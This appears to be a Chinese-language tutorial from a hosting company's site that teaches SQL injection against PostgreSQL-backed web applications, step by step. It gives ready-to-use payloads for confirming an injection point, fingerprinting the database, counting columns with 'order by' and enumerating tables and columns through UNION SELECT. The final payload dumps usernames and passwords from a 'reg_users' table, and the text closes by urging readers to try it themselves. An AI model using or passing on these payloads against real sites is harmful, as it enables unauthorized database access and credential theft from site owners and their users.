您好,登錄后才能下訂單哦!
本篇內容主要講解“postgreasql數據庫注入的過程”,感興趣的朋友不妨來看看。本文介紹的方法操作簡單快捷,實用性強。下面就讓小編來帶大家學習“postgreasql數據庫注入的過程”吧!
一、判斷是否存在注入
and 1=2 返回錯誤
and 1=1 返回正常,存在注入
and 1::int=1 返回正常說明是postgresql數據庫
二、判斷字段數量
order by 5 返回錯誤
order by 4 返回正常說明,有四列
三、聯合查詢
union select '1','2','3','4' 可以看出2/3號位置顯示
四、獲取當前數據庫
union select '1',current_database(),'3','4'
五、獲取第一個表
union select '1',relname,'3','4' from pg_stat_user_tables limit 1 offset 0
獲取第二個表
union select '1',relname,relname,'4' from pg_stat_user_tables limit 1 offset 1
六、獲取第一個字段
union select '1',column_name,'3','4' from information_schema.columns where table_name='reg_users' limit 1 offset 0
獲取第二個字段
union select '1',column_name,'3','4' from information_schema.columns where table_name='reg_users' limit 1 offset 1
七、獲取字段內容
union select '1',''||name||','||password||'','3','4' from reg_users
到此,相信大家對“postgreasql數據庫注入的過程”有了更深的了解,不妨來實際操作一番吧!這里是億速云網站,更多相關內容可以進入相關頻道進行查詢,關注我們,繼續學習!
免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。